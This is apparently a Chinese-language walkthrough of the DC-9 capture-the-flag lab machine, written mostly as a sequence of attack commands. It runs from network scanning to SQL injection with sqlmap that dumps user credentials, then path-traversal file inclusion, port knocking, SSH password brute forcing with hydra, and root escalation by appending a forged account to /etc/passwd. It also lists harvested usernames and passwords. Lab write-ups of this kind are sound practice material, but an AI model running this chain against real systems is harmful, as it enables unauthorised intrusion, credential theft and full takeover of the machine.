查看dc-9的mac地址
sudo arp-scan -l
找出dc-9的IP地址
sudo nmap -A -p- 10.9.11.26
扫描dc-9端口
访问80端口
查看wappalyzer
dirb http://10.9.11.26/
扫描目录
进入css
点击style.css
进另一个目录includes
dirb效果不太好,使用dirmap。
访问http://10.9.11.26/display.php
访问http://10.9.11.26/manage.php
访问http://10.9.11.26/search.php
输入一个数字尝试
总是转到results.php,抓包尝试
经过尝试,存在注入
把请求存成一个文档,使用sqlmap
sudo sqlmap -r 1.txt --dbs
sudo sqlmap -r 1.txt --current-db
sudo sqlmap -r 1.txt -D Staff --tables
sudo sqlmap -r 1.txt -D Staff -T Users --columns
sudo sqlmap -r 1.txt -D Staff -T Users -C Username,Password --dump
admin:transorbital1登录
浏览页面,发现welcome、manage、addrecord都有可能存在文件包含漏洞
选择manage.php进行尝试文件包含漏洞,成功
用户名总结
root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
listirc
gnats
nobody
_apt
systemd-timesync
systemd-network
systemd-resolve
messagebus
sshd
systemd-coredump
mysql
marym
julied
fredf
barneyr
tomc
jerrym
wilmaf
bettyr
chandlerb
joeyt
rachelg
rossg
monicag
phoebeb
scoots
janitor
janitor2knockd.conf是一种端口试探服务器工具。它侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit)。telnet或Putty等客户软件通过向服务器上的端口发送TCP或数据包来启动端口命中,也可以直接用nc敲击端口。
尝试是否存在
访问http://10.9.11.26/welcome.php?file=../../../../etc/knockd.conf
经过百度,进行敲门
sudo nc 10.9.11.26 7469
sudo nc 10.9.11.26 8475
sudo nc 10.9.11.26 9842
nmap查看ssh 22端口开了没
已得到了所有用户,尝试爆破
sudo hydra -L use.txt -P passwd.txt ssh://10.9.11.26 -t 32
按顺序先选择fredf登录B4-Tru3-001
查看sudo -l成功
选择chandlerb登录UrAG0D!
查看sudo -l失败
选择joeyt登录Passw0rd
查看sudo -l失败
选择janitor登录Ilovepeepee
查看sudo -l失败
经过四个账户的查询发现只有fredf有一定权限
cd /opt/devstuff/dist/test/
ls -al
执行
find / -name "test.py" 2>/dev/null
cd /opt/devstuff/
cat test.py
#!/usr/bin/python
import sys
if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)
else :
f = open(sys.argv[1], "r")
output = (f.read())
f = open(sys.argv[2], "a")
f.write(output)
f.close()加密一个密码
perl -le 'print crypt("123456","salt")'
构造一个账户输入到tmp中的passwd
echo "xyt:sahL5d5V.UWtI:0:0:xyt:/root:/bin/bash" >>/tmp/passwd
使用test将账户写入/etc/passwd中
sudo ./test /tmp/passwd /etc/passwd
切换账户拿到root权限
注:本篇文章属于原创,如有转发,请标明来源,欢迎各位童鞋参考,谢谢合作。